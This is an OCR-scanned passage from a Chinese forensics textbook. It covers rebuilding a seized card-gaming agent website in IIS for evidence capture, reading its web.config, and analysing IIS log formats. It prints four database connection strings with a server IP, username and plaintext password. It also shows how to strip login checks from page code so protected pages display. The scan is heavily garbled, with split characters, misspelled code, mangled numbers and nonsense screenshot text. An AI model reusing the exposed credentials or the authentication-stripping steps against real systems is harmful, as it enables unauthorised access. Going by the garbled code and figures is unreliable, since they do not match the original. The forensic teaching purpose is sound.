用 程序 所 使 用 的 . NET Framework 的 版 本 为 1. 1. 4322。 


(5) Web. config 文件 是 一 个 XML 文本 文件 ,用 来 存储 ASP. NET Web 应 用 程序 的 


配置 信息 (如 最 常用 的 设置 ASP.NET Web 应 用 程序 的 身份 验证 方式 ) ,可 以 出 现在 应 用 
程序 的 每 一 个 目录 中 。 当 通过 .NET 新 建 一 个 Web 应 用 程序 后 ,默认 情况 下 会 在 根 目录 
自动 创建 一 个 默认 的 web. config 文件 ,包括 默认 的 配置 设置 ,所 有 的 子 目录 都 继承 它 的 
配置 设置 。 

(6) 根据 编程 框架 特点 ,在 Web 应 用 程序 中 常见 的 重要 文件 类 型 有 aspx、cs、dll 及 
config 等 。 

Q@ aspx 文件 。 

扩展 名 为 aspx, 为 Web 窗 体 页 ,主要 是 各 种 界面 控件 代码 。 

@ aspx. cs 文件 。 

扩展 名 为 aspx. cs, 为 后 台 逻 辑 实 现代 码 , 在 .NET 中 ,在 创建 aspx 文件 的 同时 ,会 
动 创 建 一 个 对 应 的 aspx. cs 文件 ,该 文件 根据 项 目 需求 设置 处 理 aspx 文件 中 的 相应 控 
件 值 。 

(3) 配置 文件 。 

配置 文件 的 扩展 名 通常 为 config、prop 等 。ASP. NET 项 目 开发 过 程 中 ,为 了 便于 修 
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改 关键 参数 测试 ,通常 将 这 些 参 数 保存 在 配置 文件 中 ,如 数据 库 IP 地 址 ,数据 库 名 称 、 连 
接 用 户 名 及 密码 等 。 

(4) 其 他 文件 。 

一 个 完整 的 ASP. NET 网 站 程序 还 通常 包含 以 下 文件 ,如 dll 文件 , 即 动态 链接 库 为 
aspx 编译 后 的 代码 ;CSS 文件 用 来 存放 美化 网 站 外 观 的 代码 ;JS 文件 存放 用 来 设置 客户 
端 动态 效果 的 代码 ,如 客户 端 信息 验证 等 。 
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【 实 训 2-7】 虚拟 机 Windows 2003 Server 作为 网 站 服务 器 ,IP 地 址 为 192. 168. 
253. 128, 客 户 机 IP 地 址 为 192. 168. 253. 1 ,客户 机 与 虚拟 机 的 联网 方式 为 host-only, 在 
虚拟 机 Windows 2003 Server 上 通过 IIS 发 布 客户 机 下 盘 下 agent 文件 夹 内 容 ,端口 为 默 
认 端 口 80。 

解析 : 打开 浏览 客户 机 下 盘 下 agent 文件 夹 目录 结构 ,如 图 2-47 所 示 。 其 中 ,发 现 大 
量 的 aspx 文件 ,可 判定 该 网 站 为 ASP. NET Web 应 用 程序 ,而 且 在 网 站 根 目 录 下 发 现 
web. config 文件 ,部 分 内 容 见 图 2-47, 解 析 后 发 现 该 网 站 连接 4 个 后 台数 据 库 ,分 别 是 ， 


《?xml version="1,0"?> 
《configuration》 
《configSections》 
《1--logdnet 配 置 节 --> 
《section nane="logdnet” type="logdnet.Config.LogsdNetConfigurationSectionHandler, logdnet”/> 
/configSections> 
<appSettings> 
《1-- 设 置 数据 库 连接 字符 串 是 否 加 密 -> 
《add key="IsEncrypt” value="false"/> 
《1-- 是 否 记 录 登 录 日 志 --> 
《add key="RecordLoginLog” value="True"/> 
《!-- 是 否 记录 操作 日 志 一 > 
《add key="RecordOperateLog” value="True”/> 
《!-- 允 许 开设 的 代理 级 别 ，0 表 示 不 限制 --> 
《add key="AgentLevel” value="6"/> 
/appSettings> 
<comectionStrings> 
《! 一 游戏 账号 数据 库 一 > 
《add manme="GaneUserDB” cormectionString="server=121. 10. 107. 205, 2578:database=LYGameUserDB:uid=ningshi:pwd=ningshi~180.0. ;"/> 
《|-- 游 戏 金币 数据 库 -一 > 
《add nane="GaneDB” cormectionString="server=121. 10. 107. 205, 2578; database=LYCaneDB:uid=ningshi;pwd=ningshi~190.0. :"/> 
《!-- 游 戏 服务 器 数据 库 -一 > 
《add nane="ServerInfoDB” cormectionString="server=121. 10. 107. 205, 2578;database=LYServerInfoDB;uid=ningshi;pyd=ningshi~190.0. ; /> 
《!-- 系 统管 理 数据 库 -~-> 
《add nane="SystenllanageDB” connectionString="server=121. 10. 107. 205, 2578:; database=Systenjlanageiuid=ningshi:pwd=ningshi~190.0. ;“/> 
/cormectionStrings> 


图 2-47 web. config 文件 内 容 


(1) 游戏 账号 数据 库 。 

数据 库 IP 地 址 为 121. 10. 107. 205 ,端口 号 为 2578 ,数据 库 名 称 为 LYGameUserDB， 
连接 数据 库 所 使 用 的 用 户 名 为 mingshi, 密 码 为 "mingshi 一 !@0.0.”。 

(2) 游戏 金币 数据 库 。 

数据 库 IP 地 址 为 121. 10. 107. 205 ,端口 号 为 2578, 数 据 库 名 称 为 LYGameDB, 连 接 
数据 库 所 使 用 的 用 户 名 为 mingshi, 密 码 为 "mingshi 一 !@0.0.”。 

(3) 游戏 服务 器 数据 库 。 

数据 库 IP 地 址 为 121. 10. 107. 205 ,端口 号 为 2578 ,数据 库 名 称 为 LYServerInfoDB， 
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连接 数据 库 所 使 用 的 用 户 名 为 mingshi, 密 码 为 “mingshi 一 !@0.0.”。 

(4) 系统 管理 数据 库 。 

数据 库 IP 地 址 为 121. 10. 107. 205 ,端口 号 为 2578 ,数据 库 名 称 为 SystemManage, 连 
接 数据 库 所 使 用 的 用 户 名 为 mingshi, 密 码 为 “mingshi 一 !@0.0.”。 

要 想 完整 发 布 该 网 站 ,需要 找到 IP 地 址 为 121. 10. 107. 205 的 数据 库 服务 器 ,从 中 下 
载 上 述 4 个 数据 库 的 备份 文件 ,但 是 如 果 在 实际 检验 过 程 中 发 现 数据 库 服务 器 托管 在 国 
外 ,而 且 没 有 合法 用 户 能 够 远程 登录 该 服务 器 下 载 相 关 数 据 库 。 为 了 更 好 地 固定 网 页 证 
据 , 可 以 通过 IIS 将 网 站 前 台 页 面 发 布 出 来 ,屏蔽 数据 库 相 关 部 分 ,使 网 页 能 够 在 浏览 器 
中 显示 。 


1. 上 传 源 码 文件 至 服务 器 内 
将 客户 机 下 盘 下 agent 文件 夹 设 为 共享 ,将 该 文件 夹 内 容 复制 至 网 站 服务 器 C 盘 根 
目录 下 ,具体 操作 步骤 参见 1. 5. 2。 


2. 在 网 站 服务 器 内 安装 .NET Framework20 

由 于 Windows 2003 Server 操作 系统 自 带 的 IIS6.0 内 的 .NET 版 本 为 1. 1. 4322 ,而 
通过 对 应 用 程序 aspnet_client 文件 夹 内 容 进行 解析 ,发 现 该 程序 所 使 用 的 . NET 版 本 为 
2.0.50727, 如 图 2-48 所 示 。 

因此 ,发 布 该 网 站 之 前 需要 在 Windows 2003 
Server 操作 系统 内 安装 .NET Framework2. 0, 安 
装 成 功 后 ,在 “Internet 信息 服务 管理 器 "界面 中 的 
“Web 服务 扩展 ” 子 窗口 内 出 现 ASP. NET v2. 0. 50727 项 ,而且 是 允许 状态 ,如 图 2-49 
所 示 。 


DF: webshopl\agent\mwroot\aspnet_client\systen_web | 


图 2-48 ”aspnet_client 文件 夹 内 容 


信息 服务 CTIS) 管 理 器 


同 文件 四 换 作 多 ”查看 WW 窗口 呈 。 帮助 0 
| 甸 | 加 | 久 加 罗 | 久 | 旦 | > 


到 了 了 所 有 未 知 Cor 扩展 
了 了 所 有 未 知 ISAPI 扩展 。 禁止 


图 Aetive Server Pages 允许 
图 ASP.NET vi.1.4322 区 许 
号 ASP.IET v2.0.50727 。 区 许 
加 Internet 数据 连接 器 禁止 
中 YebDAY 禁止 
| 在 服务 器 端的 包 合 文件 禁止 


闫 添加 一 个 新 的 Yeb 服务 扩展 
加 对 特定 的 应 用 程序 允许 所 有 
Yeb 服务 扩展 


国 禁止 所 有 web 服务 扩展 
会 打开 帮助 本 


图 2-49 成 功 安装 . NET Framework2.0 
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3. 发 布 Agert 文 件 夹 内 容 

在 IIS6 中 发 布 ASP. NET 程序 按照 网 站 创建 向 导 默 认 选 项 设置 即 可 ,需要 注意 以 下 
几 点 。 

(1) 设置 网 站 主 目录 。 

网 站 主 目录 即 为 网 站 源码 所 在 目录 ,考虑 到 ASP. NET Web 应 用 程序 目录 结构 特 
点 ,在 网 站 根 目 录 内 有 配置 文件 web. config 文件 ,因此 保证 发 布 完 后 目录 结果 如 图 2-50 
所 示 。 


园 Internet 信息 服务 CTS) 管 理 器 
号 文件 四 操作) 查看 WW 窗口 @)。 帮助 
CE > ml 


国 Global. asax 
司 Login aspx 
国 Yeb. config 


图 2-50 AGENT 网 站 目录 结构 


(2) 在 网 站 属性 中 的 ASP. NET 选项 卡 中 ,选择 正确 的 . NET 版 本 ,如 图 2-51 所 示 。 


AGENT 尾 性 31x 
网 | 性 能 | Ishrr 第 渤 器 | 主 B 录 | 二 1 
目录 安全 性 | ”jrTP 头 ”| 。 自 定义 错误 
ASP 

net 

ASP,NET version: [os07z7 可 

Virtual path: Fam 

File location: [Eagentiwwwrootiweb.config 

File creation date: Esso 

File last modified; Eoiran 16:56:40 


Ed Global Gonfiouratior er | Edt Confiouratione, | 


确定 | 取消 | 应 用 凶 天 助 
图 2-51 选择 ASP. NET 版 本 


58 


Eee 第 2 章 ASP 网 站 构建 与 分 析 mm 


(3) 测试 。 
在 客户 端 访问 http://192. 168. 253. 128/Login. aspx, 显 示 结 果 如 图 2-52 所 示 ,表明 
这 是 一 个 棋牌 代理 后 台 Web 应 用 程序 。 


六 登录 - 模 牌 代理 后 台 x 四国 
人 CG 癌 192.168. 253.128 


棋牌 代理 后 全 


图 2-52 Login. aspx 页 面 内 容 


4 页 面 不 能 正常 显示 

因为 Login. aspx 没有 涉及 数据 库 代码 ,所 以 很 顺利 通过 浏览 器 就 能 够 访问 该 页 面 内 
容 , 由 于 该 网 站 缺少 后 台数 据 库 , 很 多 页 面 会 遇 到 不 能 正常 显示 的 问题 ,这 时 就 需要 对 程 
序 代码 进行 解析 ,注释 掉 数 据 库 连 接 代码 ,最 大 程度 地 解析 页 面 内 容 , 便 于 检验 人 员 固 定 
网 页 证 据 。 

(1) 在 客户 端 输入 http://192. 168. 253. 128/manage/ AgentInfoEdit. aspx, 访 问 后 
发 现 结果 会 自动 跳 转 到 login. aspx 页 面 。 

@ 解析 代码 ,去 掉 相关 验证 信息 

页 面 重新 跳 转 到 Login. aspx 页 面 ,表明 AgentInfoEdit. aspx 文件 进行 了 登录 验证 ， 
不 允许 用 户 直接 访问 该 页 面 ,要 想 显 示 AgentInfoEdit. aspx 文件 内 容 , 只 需 找 到 相关 的 
登录 验证 代码 段 ,注释 掉 即 可 。AgentInfoEdit. aspx 文件 内 容 如 图 2-53 所 示 ,中间 大 段 
部 分 为 HTML 文档 脚本 ,实现 前 台 界 面 显示 ,值得 注意 的 是 “二 %@ Page Language 一 
"C#" AutoEventWireup=" true" CodeBehind=" AgentInfoEdit. aspx. cs" Inherits= 
"Lion. Agent. UI. Manage. AgentInfoEdit" % 过”, 表 明 该 页 面 的 后 台 业 务实 现代 码 在 
AgentInfoEdit. aspx. cs 文件 中 ,而 且 该 文件 继承 了 Lion. Agent. UI. Manage. AgentInfoEdit 
类 ,尝试 将 Inherits 王 " Lion. Agent. UI. Manage. AgentInfoEdit 去 掉 , 再 次 访问 http:// 
192. 168. 253. 128/manage/ AgentInfoEdit. aspx, 结 果 如 图 2-54 所 示 。 
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下 AgentInfoEdit.aspx 一 记事 本 


文件 (E) 编辑 (E) 格式 (0) 查看 (VW) 帮助 (四 
《8%@ Page Language="C#" AutoEventWireup="true"” CodeBehind="AgentInfoEdit.aspx.cs" 
Inherits="Lion.Agent .UI .Manage -hgentInfoEdit” 名 > 


<#DOCTYPE html PUBLIC “-//W3C/7DTD XHTHL 1.8 Transitional//EN" 
“http://www.w3.0rg/TR/xhtml1/DTD/xhtml1-transitional .dtd"> 
《html xnmlns="http://wuw.w3.0rg/1999/xhtm1"> 
<head runat="server"> 
《title?> 资 料 修改 </title> 
《link hre [5ssydefault-css” rel="stylesheet" type="text/css” /> 
《script src: ZJsybase-js” ty text/javascript"></script> 
<script src="Js/AgentInfoEdit.is” type="text/javascript">¢/script> 
</head> 
<body> 
《Form id="form1" runat="server"> 
《diu id="main"> 
<div class="currentPath"> 


当前 位 置 ， 代 理 后 台 >> 信 息 维 护 >> 资 料 修改 


图 2-53 AgentInfoEdit aspx 文件 内 容 


四 Rantime Error 


€ 3 © D192.168.253.128/manage/AgentInfoEdit. aspx 


Server Error in /" Application. 


Runtime Error 


Description: An application error occurred on the server The current custom error setings for this application prevent 
the details of the application error fom being viewed remotely (for security reasons) It could, however, be viewed by 
browsers running on the local server machine. 


Details: To enable the details ofthis specific error message to be viewable on remote machines, please create a 
<customErrors> tag within a “web.config” configuration file located in the root directory of the current web application. 
This <customErrors> tag should then have is moder attribute set to "Of 


<1-- Web.Config Configuration File --> 


<configuration> 
<system.web> 
<customErrors mode="Off"/> 
</system.web> 
</configuration> 


图 2-54 访问 AgentInfoEdit. aspx 页 面 错误 信息 


@ 将 customErrors 模式 设 为 off。 

通过 上 一 步 的 设置 操作 可 以 看 出 AgentInfoEdit. aspx 页 面 没 有 发 生 请 求 跳 转 ,但 是 
页 面 出 现 了 运行 错误 。 通 常情 况 下 .需要 根据 提示 的 错误 信息 进行 相应 的 调整 ,但 是 由 于 
应 用 程序 默认 被 设置 为 友好 模式 ,不 会 显示 详细 的 错误 提示 信息 , 接 下 来 需要 手动 将 应 用 
程序 的 友好 错误 模式 关闭 , 即 在 网 站 Agent 属性 窗口 中 ,选择 ASP. NET 选项 卡 , 见 
图 2-51。 在 该 对 话 框 中 单 击 Edit Configure 按钮 ,弹出 的 对 话 框 如 图 2-55 所 示 , 在 
Custom error mode 下 拉 列 表 中 选择 Off 项 。 

根据 错误 提示 信息 ,去 掉 网 页 中 涉及 数据 库 的 相关 代码 。 

重新 访问 http://192. 168. 253. 128/manage/ AgentInfoEdit. aspx, 显示 详细 错误 提 
示 信 息 如 图 2-56 所 示 。 
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图 2-55 将 Custom error mode 设 为 Off 


DD) compilation Error 


€ DC D192.168.253. 128/manage/AgentInfoRdit. aspx 


Server Error in /" Application. | 


Compilation Error 


Description: An error occurred during the compilation of a resource required to service this request Please review the 
following specific error details and modify your source code appropriately. 


Compiler Error Message: CS0117: ASP .manage_agentinfoedit_aspx does not contain a definition for 
‘btnUpdateBaselnfo_Click 


Source Error: 


Line 48: > 1i> 
i class="toolbar 
<asp:Button ID=" ne runat="server" 
a 
Line 52: </ul 


人 TREE 一 
图 2-56 ”AgentInfoEdit. aspx 页 面 详细 错误 信息 1 


按照 提示 信息 ,在 AgentInfoEdit. aspx 页 面 跳 转 到 第 50 行 ,将 二 asp: Button ID 一 
"btnUpdateBaseInfo" runat 王 "server”Text 二 "保存 修改 " OnClick 二 "btnUpdateBaseInfo_ 
Click" /二 代 码 注 释 掉 ,重新 访问 ,结果 如 图 2-57 所 示 。 

同样 ,按照 提示 信息 ,在 AgentInfoEdit. aspx 页 面 跳 转 到 第 68 行 ,将 相应 出 错 代码 
注释 掉 , 重 新 访问 ,结果 如 图 2-58 所 示 。 
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DD Conpilation Error x 


€ DP C | 口 192.168.253.128/manage/AgentInfaEdit.aspx 


Server Error in ‘/" Application. 


Compilation Error 


Description: An error occurred during the compilation of a resource required to service this request. Please review the 
following specific error details and modify your source code appropriately. 


Compiler Error Message: CS0117: ASP .manage_agentinfoedit_aspx does not contain a definition for 
‘binUpdatePwd_Click 


Source Error: 

Line 66: </]i> 

Line 67: <li class="toolbar"> 

Line 68: <asp:Button ID="btnUpdatepwd" runat="server"” Text= 
Line 69: </1i> 

Line 70: 


< 


站 资料 修改 -棋牌 代理 后 台 x 性 

全 © D192.168.253.128/manage/AgentInfoEdit. aspx 
当前 位 置 : 代理 后 台 > 信息 维护 > 资料 修改 

三 修改 基本 资料 


代理 账号 
真实 姓名 : 


开户 行 名称 : 
开户 行 地 址 : 
银行 卡号 : 


三 修改 密码 
新 密码 : | 


确认 密码 : 


图 2-58 ”AgentInfoEdit. aspx 页 面 内 容 


35 ”ASP 网 站 平台 分 析 


25.1 lS 日 志 解 析 


ASP 网 站 平台 主要 是 由 Web 服务 器 、 后 台数 据 库 、ASP 应 用 服务 器 及 网 站 源码 组 

成 。 对 ASP 网 站 平台 进行 分 析 时 ,需要 在 这 些 软件 运行 日 志 中 找到 客户 端的 特征 信息 。 

通过 了 解 网 站 后 台 架 构 情 况 可 知 , 直 接 面向 客户 端的 是 Web 服务 器 ,其 运行 日 志 会 记录 

到 客户 端的 信息 ,因此 在 对 网 站 后 台 进 行 分 析 时 , Web 服务 器 日 志 是 重点 处 理 对 象 。 
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ASP 网 站 平台 的 Web 服务 器 通常 采用 IIS,IIS 的 Web 日 志 就 是 IIS 下 架设 网 站 的 运行 
记录 ,每 次 访问 者 向 网 站 发 送 一 个 请 求 ,不管 这 个 访问 是 否 成 功 ,日 志 都 会 进行 记录 。 日 
志 包 括 谁 访问 了 站 点 ,访问 者 查看 了 哪些 内 容 以 及 最 后 一 次 查看 信息 的 时 间 等 。 


1. 定位 日 志文 件 

IIS6.0 的 Web 日 志文 件 默认 存放 位 置 为 % systemroot%\system32\LogFiles 文件 
夹 下 ,默认 每 天 生成 一 个 日 志文 件 ,文件 名 格式 为 “ex 十 年 份 的 末 两 位 数字 十 月 份 十 日 
期 ”>。 为 了 对 日 志文 件 进行 保护 ,Web 管理 员 通 常 使 用 非 默认 位 置 ,检查 员 可 通过 以 下 步 
又 找到 日 志文 件 : 

(1) 在 IIS 管理 器 界面 中 选择 所 要 查看 日 志 的 网 站 ,如 dvbbs, 右 击 , 在 弹出 的 快捷 菜 
单 中 选择 “属性 ”命令 ,将 打开 “dvbbs 属性 ?对 话 框 , 如 图 2-59 所 示 。 

(2) 选择 该 对 话 框 中 的 “活动 日 志 格 式 ” 对 应 的 “属性 ”命令 打开 “日 志 记 录 属 性 ”对 话 
框 ,在 该 对 话 框 内 可 见 日 志文 件 目录 及 文件 名 信息 如 图 2-60 所 示 。 日 志文 件 位 于 C:\ 
WINDOWS\system32\LogFiles\W3SVC722942227 目录 下 ,文件 名 则 根据 命名 规则 与 日 
期 相关 ,如 果 想 要 调查 2012 年 3 月 4 日 的 日 志文 件 , 则 需要 在 该 目录 下 查找 ex120304. 
log 文件 。 


了 可 
目录 安全 性 ”| HTP 头 | 。 自 定 义 模 误 。 | Server Extensions 2002 
网 站 | 性 能 |  ISAPT 久 过 器 | 主 上 录 | 文档 
| 由 标识 日 志 记录 尾 性 加 
描述 G@): FE 
常规 | 高 多 | 
IF 地 址 号); 1192. 168. 6. 128 S| 高 级 四 ). 
TDD: | i 
SSL 端口 QD): 区 中 
[连接 和 隆 天 加 ] 
连接 超时 QD ; 120 赦 人 
和 c re 
二 记忆 用 卓志 记录 加 ) 个 当 文件 大 小 达到 @G): 
活动 日 志 格式 轨 ; 下 习 而 
Jrsc 扩展 目 志文 件 格式 可 属性 四 
FE 厂 文件 命名 和 创建 使 用 当地 时 间 CD) 
日 志文 件 目录 CD) : 
Fwmnaowsvsystmsztoais 浏览 人 @)， 
日 志文 件 名 : WISYC722942227\exyymndd. log 
取消 ”| _ 应 用 久 天 助 取消 应 用 而 得 助 | 
图 2-59 “dvbbs 属性 ”对 话 框 图 2-60 “日 志 记 录 属 性 ”对 话 框 


2. 日 志文 件 格 式 

在 网 站 属性 对 话 框 的 “网 站 ”选项 卡 中 ,默认 启用 日 志 记 录 。 可 以 以 多 种 格式 记录 活 
动 日 志 , 在 “活动 日 志 格式 ”下 拉 列 表 中 共有 4 种 日 志 格 式 可 供 选择 ,如 图 2-61 所 示 。 默 
认 使 用 W3C 扩展 日 志文 件 格式 。 

这 4 种 文件 格式 的 日 志 所 记录 的 内 容 各 有 不 同 , 其 区 别 如 下 : 

(1) W3C 扩展 日 志文 件 格式 是 一 个 包含 多 个 不 同属 性 、 可 自 定义 的 ASCII 格式 。 可 
以 记录 对 管理 员 来 说 重要 的 属性 ,可 省 略 不 需要 的 属性 字段 来 限制 日 志文 件 的 大 小 。 各 
属性 字段 以 空格 分 开 。 时 间 以 UTC 形式 记录 。 
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可 可 
-一 | rTP 头 | 。 自 定义 错误 “| Server Extensions 2002 
| 性能 | TISAEI 第 选 器 | 主 上 录 | 文档 
描述 人 @): [avbbs 
?地 址 外 ):; 192. 168. 6. 128 了 高 胃 ) | 
TCP 端口 0D); lao SSL 端口 QL); 
连接 
连接 超时 0D) : | 120 秒 
厅 保持 ITTP 连接 到) 
六 f” 局 用 日 志 记 录 到 ) 
soft IIS 日 志文 件 格式 ”| 属性 到 ).… | 
pe I15 
es 从 几时 
Es 站 过 


取消 “| 应 用 外 帮助 
图 2-61 “活动 日 志 格式 ?设置 对 话 框 


(2) ODBC 日 志 记 录 格 式 是 用 来 记录 符合 开放 式 数 据 库 连接 (ODBC) 的 数据 库 
(Microsoft Access 或 SQL Server) 中 一 组 固定 的 数据 属性 。 记 录 项 目 包 括 用 户 的 IP 地 
址 ,用户 名 、 请 求 日 期 和 时 间 ( 记 录 为 本 地 时 间 )、HTTP 状态 码 、 接 收 字 节 发送 字 节 、 执 
行 的 操作 和 目标 (如 下 载 的 文件 )。 对 于 ODBC 日 志 记 录 , 必 须 指 定 要 登录 的 数据 库 , 并 
且 设 置 数据 库 接收 数据 。 不 过 这 种 方式 会 使 IIS 禁用 内 核 模 式 缓存 ,可 能 会 降低 服务 器 
的 总 体 性 能 。 

(3) NCSA 公用 日 志文 件 格式 是 美国 国家 超级 计算 技术 应 用 中 心 公 用 格式 ,是 一 种 
固定 (不 能 自 定义 ) 的 ASCII 格式 ,记录 了 关于 用 户 请 求 的 基本 信息 ,如 远程 主机 名 、 用 户 
名 ,日 期 \ 时 间 、 请 求 类 型 .HTTP 状态 码 和 服务 器 发 送 的 字 节 数 。 项 目 之 间 用 空格 分 开 ， 
时 间 记 录 为 本 地 时 间 。 

(4) Microsoft IIS 日 志文 件 格 式 是 固定 (不 能 自 定义 ) 的 ASCII 格式 。IIS 格式 比 
NCSA 公用 格式 记录 的 信息 多 。IIS 格式 包括 一 些 基 本 项 目 , 如 用 户 的 IP 地址、 用 户 名 、 
请 求 日 期 和 时 间 、 服 务 状态 码 和 接收 的 字 节 数 。 另 外 ,IIS 格式 还 包括 详细 的 项 目 , 如 所 用 
时 间 发 送 的 字 节 数 .动作 (如 GET 命令 执行 的 下 载 ) 和 目标 文件 。 这 些 项 目 用 逗号 分 开 , 使 
得 格式 比 使 用 空格 作为 分 隔 符 的 其 他 ASCII 格式 更 易于 阅读 。 时 间 记录 为 本 地 时 间 。 


3. 日 志 字 段 解析 

IIS 日 志 主 要 用 于 记录 用 户 对 网 站 的 访问 行为 ,不 管 哪 种 类 型 的 IIS 日 志文 件 , 通 常 
包括 客户 端 访问 时 间 、 访 问 来 源 、 来 源 IP、 客 户 端 请 求 方式 .请 求 端口 .访问 路 径 及 参数 、 
HTTP 状态 码 状 态 .返回 字 节 大 小 等 信息 。 下 面 详细 介绍 每 种 格式 的 IIS 日 志文 件 中 字 
段 含义 。 

1) W3C 扩展 日 志文 件 格式 

对 于 W3C 扩展 日 志文 件 格式 ,是 管理 员 用 户 自 定义 生成 的 ,具体 字段 含义 可 见 日 志 
记录 属性 窗口 中 的 “高 级 ”选项 设置 。 在 网 站 属性 对 话 框 的 “网 站 ”选项 卡 中 ,活动 日 志 格 
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式 选 择 “W3C 扩展 日 志文 件 格式 ”项 , 单 击 “ 属 性 ”按钮 ,打开 “日 志 记 录 属 性 ”对 话 框 。 在 
“常规 ”选项 卡 中 可 对 日 志文 件 目录 、 文 件 名 及 日 志 计 划 进 行 设置 ;切换 至 “高 级 ”选项 卡 ， 
可 对 日 志 记 录 格 式 进行 设置 ,生成 的 日 志文 件 如 图 2-62 所 示 。 需 要 注意 的 是 , W3C 扩展 
日 志文 件 定义 日 志 采 用 GMT 时 间 ( 即 格林 尼 治 标准 时 间 ) ,而 中 国 在 GMT 十 8 时 区 , 具 
体 的 字段 描述 如 表 2-1 所 示 。 


六 1 国 E 查看 帮助 tg 
aSoftware: Microsoft Internet Information Services 6-8 
HUersion: 1.0 

HDate: 2812- 92- 93 84:48:54 

BFields: date time s-ip cs-nethod cs-uri-sten cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-subst， 


:88 192-168-6-128 GET /index-asp — 89 - 192-168-6-1 Hozilla/4.@*(conpatible;+*MSIE+6.0; 
:69 192.168.6.128 GET /inc/Main.js - 88 - 192.168.6.1 Mozilla/4.0+(conpatible;+*HSIE+6.0; 
28 GET /Skins/Default/dunenubg3.gif - 88 - 192.168.6.1 Mozilla/4.0+(compatible;+*HSIE+ 
6.128 GET /Skins/Default/css/default/topbg-gif - 980 - 192.168.6.1 Mozilla/4.0+(conpatibl, 
28 GET /inages/1ogogif - 88 - 192.168.6.1 Mozil- 0+(conpatible;+*HSIE+6 .9;+Windows 
28 GET /Skins/Default/css/default/bottonbg .gif — 192.168.6.1 Hozilla/4.0+(conpat 
28 GET /Skins/Default/css/default/tabs_n_tile.gi 日 - 192.168.6.1 Mozilla/4.8+(con| 
:26 192.168.6.128 GET /show ad_sc.asp fn=search.gif 88 - 192.168.6.1 Mozilla/4.8+(compatible;+*MSIE+6 
:26 192.168.6.128 GET /Skins/Default/nauspacer-gif - 88 - 192.168.6.1 Mozilla/4.0+(conpatible;+MSIE+! 
: 6-128 GET /Skins/Default/css/default/bg1.gif - 88 - 192-168-6-1 Mozilla/4.0+(compatible; 


6-128 GET /skins/default/ao1.gif - 89 - 192.168.6.1 Mozilla/4.0+(conpatible;*MSIE+6.0; 
:27 192.168.6.128 GET /skins/default/ao.gif - 89 - 192.168.6.1 Mozilla/h.0+(compatible;+*HSIE+6.0; 
:27 192.168.6.128 GET /skins/default/gb(1) -gif - 89 - 192.168.6.1 Mozilla/s.@+(conpatible;*HSIE+6 


12012-02-83 ms: 


图 2-62 W3C 扩展 格式 日 志文 件 


表 2-1 W3C 扩展 日 志 各 字段 描述 


字 有 段 描 述 
date 活动 发 生 的 日 期 
time 活动 发 生 的 时 间 
cip 访问 服务 器 的 客户 端 卫 地 址 
cs-username 访问 服务 器 的 已 验证 用 户 的 名 称 。 这 不 包括 用 连 字 符 (-) 表 示 的 匿名 用 户 
s-sitename 客户 端 所 访问 的 该 站 点 的 Internet 服务 和 实例 的 号 码 
s-computername 生成 日 志 项 的 服务 器 名 称 
s-ip 生成 日 志 项 的 服务 器 的 IP 地 址 
s-port 客户 端 连接 到 的 端口 号 
cs-method 客户 端 试图 执行 的 操作 (如 GET 方法 ) 
cs-uri-stem 访问 的 资源 ,如 Default. htm 


是 指 访问 地 址 的 附带 参数 ,如 asp 文件 “?” 后 面 的 字符 串 id= 12 等 ,如 果 没 
有 参数 则 用 ”表示 


HTTP 状态 码 。200 表示 成 功 ,403 表示 没有 权限 ,404 表示 打 不 到 该 页 面 ， 


cs-uri-query 


Sr 500 表示 程序 有 错 

sc-win32-status 表示 客户 端 是 否 为 32 位 系统 的 代码 。 如 果 是 ,那么 这 里 记录 的 就 是 0 
se-bytes 服务 器 发 送 的 字 节 数 

cs-bytes 服务 器 接收 的 字 节 数 

本 操作 花费 的 时 间 长 短 (毫秒 ) 
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式 ? 项 , 单 击 * 


ee 
cs-version 客户 端 使 用 的 协议 版 本 ,通常 为 HTTP 1.0 或 HTTP 1.1 
cs-host 显示 主机 头 的 内 容 
cs(User-Agent) 在 客户 端 使 用 的 浏览 器 信息 
cs(Cookie) 发 送 或 接收 的 Cookie 的 内 容 
cs(Referer) 用 户 访问 的 前 一 个 站 点 ,此 站 点 提供 到 当前 站 点 的 链接 


2) Microsoft 


IIS 日 志文 件 格式 


在 网 站 属性 对 话 框 的 “网 站 ?选项 卡 中 ,活动 日 志 格式 选择 “Microsoft IIS 日 志文 件 格 


属性 ”按钮 ,打开 “日 志 记 录 属 性 ”对 话 框 ,可 对 日 志文 件 目 录 、 文 件 名 及 日 志 


计划 进行 设置 ,生成 的 日 志文 件 如 图 2-63 所 示 。Microsoft IIS 格式 的 日 志文 件 没有 字段 


名 称 ,每 条 日 志 各 个 字段 所 对 应 的 含义 如 表 2-2 所 示 。 
加 
文件 @) 编辑 下 ) 格式 (0) 查看 Y) 帮助 00) 


zzzzzzzz>z>> 


2/8/2612， W3SUC722942227, CCPC-XP, 192.168.6.128, 859, 417, 35755, 280 
278/2812, W3SUC722942227 ,CCPC-XP ,192.168.6. 93, 457, 8, 288, 64, 
2/8/2612， W3SUC722942227，CCPC-XP，192.168.6. 258, 473, 2664, 280, 
278/2812， W3SUC722942227, CCPC-XP, 192.168.6.128, 258, 462, 3915, 280, 
278/2612， W3SUC722942227, CCPC-XP, 192.168.6. 398, 481, 299, 280, 
2/8/2812， W3SUC722942227 ,CCPC-XP，192.168.6. 2888, 388, 1237, 200: 
2/8/2812， W3SUC722942227 ,CCPC-XP，192.168.6. 189, 488, 346, 280, 
2/8/2612， W3SUC722982227，CCPC-XP，192-168.6- 156, 485, 380, 280, 
2/8/2612， W3SUC722942227，CCPC-XP，192.168.6- 148, 488, 516, 280, 
2/8/2612， W3SUC722942227, CCPC-XP, 192.168.6.128, 265, 473, 382, 280, 
278/2612， W3SUC722942227, CCPC-XP, 192.168.6. 62, 468, 8, 280, 64, 
2/8/2812， W3SUC722942227 ,CCPC-XP，192.168.6. 62, 467, 0, 280, 64, 
2/8/2812， W3SUC722942227 ,CCPC-XP，192.168.6. 171, 466, 8, 288,64 
2/8/2612， W3SUC722982227，CCPC-XP，192.168.6- 265, 468, 659, 280, 
2/8/2612， ，W3SUC722942227，CCPC-XP，192.168.6- 265, 474, 445, 200, 
278/2812， W3SUC722942227, CCPC-XP, 192.168.6.128, 265, 474, 326, 280, 


图 2-63 ”Microsoft IIS 格式 日 志文 件 


表 2-2 ”Microsoft IIS 日 志 各 字段 描述 
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客户 端 IP 地 址 提出 请 求 的 客户 机 的 IP 地 址 

用 户 名 访问 服务 器 的 已 验证 用 户 的 名 称 。 连 字符 (-) 表 示 匿 名 用 户 
